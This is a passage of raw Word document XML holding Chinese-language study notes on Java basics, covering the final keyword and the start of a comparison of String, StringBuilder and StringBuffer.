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F3D5F" w:rsidRPr="00F41A4C" w:rsidRDefault="003640D6" w:rsidP="00202FA9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLineChars="50" w:firstLine="221"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="008863AC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00FF3D5F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>基础部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C84300" w:rsidRPr="00F41A4C" w:rsidRDefault="00C84300" w:rsidP="00EC31CD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>基础语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA11D8" w:rsidRPr="00F41A4C" w:rsidRDefault="00FA11D8" w:rsidP="00FA11D8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA11D8" w:rsidRPr="007E1ED0" w:rsidRDefault="003F2222" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关键字用于修饰非抽象类、非抽象类成员方法和变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F2222" w:rsidRPr="007E1ED0" w:rsidRDefault="003F2222" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类不能被继承，没有子类</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4A9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4A9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类中的方法默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4A9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4A9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F2222" w:rsidRPr="007E1ED0" w:rsidRDefault="003F2222" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法不能被子类覆盖，但可以被继承。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006101D9" w:rsidRPr="007E1ED0" w:rsidRDefault="006101D9" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员变量表示常量，只能被赋值一次，赋值后值不再改变。</w:t>
      </w:r>
      <w:r w:rsidR="00FE7DA0" w:rsidRPr="00FE7DA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r w:rsidR="00FE7DA0" w:rsidRPr="00FE7DA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基本数据类型</w:t>
      </w:r>
      <w:r w:rsidR="00FE7DA0" w:rsidRPr="00FE7DA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的变量，则其数值一旦在初始化之后便不能更改；如果是</w:t>
      </w:r>
      <w:r w:rsidR="00FE7DA0" w:rsidRPr="00FE7DA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>引用类型</w:t>
      </w:r>
      <w:r w:rsidR="00FE7DA0" w:rsidRPr="00FE7DA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的变量，则在对其初始化之后便不能再让其指向另一个对象</w:t>
      </w:r>
      <w:r w:rsidR="00FE7DA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F2222" w:rsidRPr="007E1ED0" w:rsidRDefault="006101D9" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不能用于修饰构造方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E164DD" w:rsidRPr="007E1ED0" w:rsidRDefault="00E164DD" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">private </w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="005E05CC" w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947E3C" w:rsidRPr="007E1ED0" w:rsidRDefault="006B0BA5" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E57FB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00DF4A9A" w:rsidRPr="00E57FB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00DF4A9A" w:rsidRPr="00E57FB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编程思想</w:t>
      </w:r>
      <w:r w:rsidRPr="00E57FB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00DF4A9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005E05CC" w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="005E05CC" w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidR="003E16B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947E3C" w:rsidRPr="007E1ED0" w:rsidRDefault="005E05CC" w:rsidP="00947E3C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法锁定，防止任何继承类修改它的意义和实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E05CC" w:rsidRPr="007E1ED0" w:rsidRDefault="005E05CC" w:rsidP="000D4E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>高效。编译器在遇到调用</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法时候会转入内嵌机制，大大提高效率。</w:t>
      </w:r>
      <w:r w:rsidR="000D4E15" w:rsidRPr="000D4E15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但是如果方法过于庞大，可能看不到内嵌调用带来的任何性能提升。在最近的</w:t>
      </w:r>
      <w:r w:rsidR="000D4E15" w:rsidRPr="000D4E15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="000D4E15" w:rsidRPr="000D4E15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本中，不需要使用</w:t>
      </w:r>
      <w:r w:rsidR="000D4E15" w:rsidRPr="000D4E15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidR="000D4E15" w:rsidRPr="000D4E15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法进行这些优化了</w:t>
      </w:r>
      <w:r w:rsidR="00CF4D1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00722C8B" w:rsidRPr="007E1ED0" w:rsidRDefault="00F80A3E" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00722C8B" w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当函数参数为</w:t>
      </w:r>
      <w:r w:rsidR="00722C8B" w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidR="00722C8B" w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型时，你可以读取使用该参数，但是无法改变该参数的值</w:t>
      </w:r>
      <w:r w:rsidR="003F44C6" w:rsidRPr="007E1ED0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00722C8B" w:rsidRPr="006101D9" w:rsidRDefault="00722C8B" w:rsidP="003F2222">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A235B6" w:rsidRPr="00F41A4C" w:rsidRDefault="00957261" w:rsidP="00C84300">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C84300" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005970E7" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C84300" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="00C84300" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00C84300" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidR="00C84300" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00C84300" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidR="0015575A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C86279" w:rsidRPr="00C86279" w:rsidRDefault="00C86279" w:rsidP="00C86279">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三者主要区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C84300" w:rsidRPr="007E576B" w:rsidRDefault="00B74D90" w:rsidP="00F87F65">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">String: </w:t>
      </w:r>
      <w:r w:rsidR="007C4B05" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A72B27" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidR="00A72B27" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关键字修饰</w:t>
      </w:r>
      <w:r w:rsidR="00A72B27" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A72B27" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类不能被继承，并且它的成员方法都默认为</w:t>
      </w:r>
      <w:r w:rsidR="00A72B27" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidR="00A72B27" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidR="00A72B27" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C6FD8" w:rsidRPr="007E576B" w:rsidRDefault="007C4B05" w:rsidP="007E576B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="371" w:left="779" w:firstLineChars="25" w:firstLine="53"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的任何改变都不影响到原对象，相关的任何</w:t>
      </w:r>
      <w:r w:rsidR="00C50A7B" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作都会生成新的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C6FD8" w:rsidRPr="007E576B" w:rsidRDefault="006C774A" w:rsidP="007E576B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1155" w:hangingChars="550" w:hanging="1155"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>StringBuilder :</w:t>
      </w:r>
